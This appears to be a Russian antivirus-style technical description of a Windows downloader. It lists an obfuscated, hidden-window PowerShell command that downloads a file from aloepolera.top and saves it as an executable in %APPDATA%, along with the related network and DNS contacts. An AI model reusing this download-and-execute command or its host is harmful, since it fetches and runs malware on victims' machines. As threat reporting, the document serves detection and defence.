Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^W^ER^Sh^el^L^.Ex^E ^-E^X^e^cU^TIoNpoLI^cy Byp^AsS -nOP^RoF^I^LE -^wi^Nd^oWStYLE ^H^IDdEn (NEw-^o^B^JeCt ^sy^SteM.nE^t^.^we^b^cl^IENT^).d^o^w^N^Lo^AdF^ilE^('http://aloep...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "p^o^W^ER^Sh^el^L^.Ex^E ^-E^X^e^cU^TIoNpoLI^cy Byp^AsS -nOP^RoF^I^LE -^wi^Nd^oWStYLE ^H^IDdEn (NEw-^o^B^JeCt ^sy^SteM.nE^t^.^we^b^cl^IENT^).d^o^w^N^Lo^AdF^ilE^('http://aloep...' (со скрытым окном)